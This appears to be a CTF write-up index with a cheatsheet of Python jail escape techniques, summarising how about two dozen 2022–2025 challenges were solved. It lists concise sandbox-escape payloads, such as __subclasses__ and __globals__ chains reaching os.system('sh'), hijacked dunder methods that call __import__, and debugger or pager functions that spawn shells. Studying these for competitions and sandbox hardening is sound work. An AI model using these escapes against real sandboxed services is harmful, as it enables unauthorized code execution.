ctf-writeups

Python jail

References:

• Pyjail Cheatsheet
• Pyjail collection
• A collection of pyjails

Table of contents:

• Python jail
  • cheatsheet
    • Unicode bypass
    • Assign to variables
    • Call functions
    • Construct strings
    • No builtins
    • No numbers/booleans
    • Get python/bash shell
  • Hack.lu CTF 2025 FÄNGELSE
  • jailCTF 2025 impossible
  • jailCTF 2025 one
  • jailCTF 2025 primal
  • CrewCTF 2025 pyfuck
  • CrewCTF 2025 Bytecode Bonanza - Basics
  • WHY2025 CTF TitleCase
  • FortID CTF 2025 Michael Scottfield
  • LACTF 2025 farquaad
  • scriptCTF 2025 Modulo
  • UIUCTF 2024 Astea
  • jailCTF 2024 filterd
  • jailCTF 2024 no-nonsense
  • UofTCTF 2024 Jail Zero
  • SECCON 2024 Quals 1linepyjail
  • ImaginaryCTF 2024 ok-nice
  • ImaginaryCTF 2024 calc
  • NTUA_H4CK 2024 Snekbox
  • TBTL CTF 2024 Squeezing Tightly On Arm
  • TCP1P CTF 2024 typically not a revenge
  • TCP1P CTF 2024 functional
  • TCP1P CTF 2023 PyMagic
  • GDG Algiers 2022 Type_it
  • ImaginaryCTF Round 23 June 2022 Stackless Jail

cheatsheet

Unicode bypass

See details.

Assign to variables

• a=1 in exec
• [a:=1] in eval
• [a for a in [1]]
• [[a]for[a]in[[1]]]

Call functions

• __import__('os'): help.__class__.__getitem__ = __import__;help['os'] or help.__class__.__contains__ = __import__('os').system;'sh' in help for object, ExceptionGroup.__class_getitem__ = __import__;ExceptionGroup["os"] for class
• breakpoint(): license._Printer__setup = breakpoint; str(license)
• exec(input()): @exec\n@input\nclass a: pass

Construct strings

• __import__('os'): help.__class__.__getattr__ = __import__;help.os
• help.__doc__[index]

No builtins

• ().__class__.__base__.__subclasses__()
• ().__class__.__mro__[1].__subclasses__()
• ().__reduce_ex__(2)[0].__builtins__
• ().__reduce_ex__(2)[0].__globals__
• ().__setattr__.__objclass__.__subclasses__()

No numbers/booleans

• True
• []>[] is False
• [[]]>[] is True
• []is[] is False
• not[]is[] is True
• -~x is x+1

Get python/bash shell

• _aix_support._read_cmd_output(cmd)
• _osx_support._read_output(cmd)
• breakpoint()
• code.InteractiveConsole().interact()
• code.interact()
• doctest.debug_script(src)
• pdb.set_trace()
• pdb.run(src)
• pydoc.pipe_pager(text, cmd)
• pydoc.tempfile_pager(text, cmd)

Hack.lu CTF 2025 FÄNGELSE

Requirements:

1. No more than 5 characters: use exit(flagbuf) to leak flag, use a=exit;len=a to override function in two steps, use ⅺ for xi to break the length limitation; alternatively, set len=all to bypass length check

Details here.

jailCTF 2025 impossible

Requirements:

1. No parens: use obj.__class__.__getitem__ = func and obj[arg] to call function
2. No spaces or equal signs: use [[]for[a]in[[b]]] instead of a = b
3. No strings: set obj.__class__.__getattr__ = __import__ and obj.os to import os

Details here.

jailCTF 2025 one

Requirements:

1. Only one .: use lambda function to reuse value.__getattribute__ call
2. No builtins: use ().__setattr__.__objclass__.__subclasses__()[os_index].__init__.__globals__['system']('sh') to get shell

Details here.

jailCTF 2025 primal

Requirements:

1. No eta: no getattr/setattr, use obj[name] to access fields
2. No builtins: use ().__reduce_ex__(2)[0].__globals__['__builtins__']['__import__']('os') to get os
3. Words should have prime length: use 'aa'.__len__() for 2, use \xXX in strings

Details here.

CrewCTF 2025 pyfuck

Requirement:

1. Only alphabetic characters, parentheses and plus sign: use plus sign to construct string, generator syntax and function call
2. Limited builtins and count of +: search for a short combination to create the intended string

Details here.

CrewCTF 2025 Bytecode Bonanza - Basics

Requirements:

1. Limit to the following opcodes in Python 3.9:
   1. POP_TOP: pop top element
   2. DUP_TOP: duplicate top element
   3. UNARY_INVERT: invert top element
   4. BINARY_ADD: pop two elements, push the sum of them
   5. POP_JUMP_IF_TRUE: pop top element, jump to target if element is true (non-zero)
   6. EXTENDED_ARG: construct 16 bit argument for the next op
2. Implement three functions: a-b, 1337 and a*b

Details here.

WHY2025 CTF TitleCase

Use unicode bypass to avoid str.title().

Details here.

FortID CTF 2025 Michael Scottfield

Requirements:

1. Length <= 500: Easy to achieve
2. Allow () but no parameters: Use pdb.set_trace() or code.InteractiveConsole().interact()
3. No strings: Use docstrings and str[index] to create strings
4. No numbers: Use True as 1
5. No builtins: Use ().__class__.__base__.__subclasses__()

Details here.

LACTF 2025 farquaad

Requirements:

1. Only printable characters
2. No e or E: Use list(x.__dict__)[index] to find strings with e in it and call it via x.__dict__[list(x.__dict__)[index]](args)
3. No builtins: Use ().__class__.__mro__[1].__subclasses__()

Details here.

scriptCTF 2025 Modulo

Requirements:

1. No builtins: use ().__class__.__base__.__subclasses__()[os_wrap_index].__init__.__globals__["system"]("sh")
2. No lowercase letters except c, only allow % binary op: use "%c%c" % (97, 98) to construct strings
3. No integers: use ()<((),) as 1, use -~x as x+1
4. No .: use getattr(A, "B") as A.B

Details here.

UIUCTF 2024 Astea

Requirements:

1. No function call: Use f"{license}" for license._Printer__setup in [function_to_call]] to call function_to_call
2. No builtins: Use .__builtins__ of the given function to access builtins dict, or .__globals__["__builtins__"] of the given function to access builtins module
3. No assignment: Use [a:=b] for assignment

Details here.

jailCTF 2024 filterd

Requirement:

1. Input length <= 14: raise input length limit on the fly
2. Blacklisted builtins: reuse existing function to re-evaluate

Details here.

jailCTF 2024 no-nonsense

Requirements:

1. No ([=]): call functions using decorators, @exec\n@input\nclass a: pass
2. AST name does not appear in input: use unicode bypass
3. No newlines: use \r instead of \n for multiline code

Details here.

UofTCTF 2024 Jail Zero

Requirements:

1. No alphabetic: Use Unicode Block “Mathematical Alphanumeric Symbols” to bypass
2. No numbers: Use (''=='') as 1
3. No double underscores: Use FULLWIDTH LOW LINE
4. No builtins: Use ().__class__.__base__.__subclasses__()

Details here.

SECCON 2024 Quals 1linepyjail

Requirements:

1. Length <= 100: Try hard to reduce input length
2. Allow () but no parameters: Use sys.modules["pdb"].set_trace()
3. No builtins: Use ().__class__.__base__.__subclasses__() to find sys

Details here.

ImaginaryCTF 2024 ok-nice

Requirements:

1. No numbers: Use True as 1
2. Exception side channel: Use integer division by zero or array out of bounds to guess each character
3. len(set(input)) <= 17: Reuse characters already appeared

Details here.

ImaginaryCTF 2024 calc

Requirements:

1. Input is a expression: Use list comprehension to execute multiple statements
2. Input should match regex: Use 1, to bypass since it is not a full match
3. Audit hook: Add signal handler, raise signal and change content of the audit hook to bypass

Details here.

NTUA_H4CK 2024 Snekbox

Requirements:

1. No non-ascii characters
2. Blacklisted dangerous functions: Use globals()[function_name] to bypass

Details here.

TBTL CTF 2024 Squeezing Tightly On Arm

Requirements:

1. No ': Use " for strings
2. Some characters may appear only once: save intermediate values to locals
3. No builtins: Use ().__class__.__base__.__subclasses__() to bypass

Details here.

TCP1P CTF 2024 typically not a revenge

Requirements:

1. No numbers: Use arr[[]is[]] for arr[0], arr[not[]is[]] for arr[1], arr[not[]is[]:][not[]is[]] for arr[2]
2. No parens: Use [class[arg] for class.__class_getitem__ in [function_to_call]] to call function
3. No assignments or commas: Use [... for a in [b] for c in [d]]
4. No spaces: Use \f i.e. form feed
5. No builtins: Use [].__class__.__base__.__subclasses__()
6. No sys module: Use <class 'os._wrap_close'> to find system

Details here.

TCP1P CTF 2024 functional

Requirements:

1. Call functions with zero argument, or return value of another function, and all function names should match [ad-z]+

Details here.

TCP1P CTF 2023 PyMagic

Requirements:

1. No (): Use class.__class_getitem__ and class[] to bypass
2. No strings: Use docstrings and str[index] to create strings
3. No numbers: Use True as 1
4. No spaces: Use \r to bypass while making input() happy
5. No builtins: Use ().__class__.__base__.__subclasses__()

Details here.

GDG Algiers 2022 Type_it

Requirements:

1. No non-ascii characters
2. No blacklisted characters
3. Prone to string injection

Details here.

ImaginaryCTF Round 23 June 2022 Stackless Jail

Requirements:

1. Function can only use at most one stack element: use CALL_FUNCTION instead of CALL_METHOD, i.e. use B = A.method; C = B() instead of A.method()

Details here.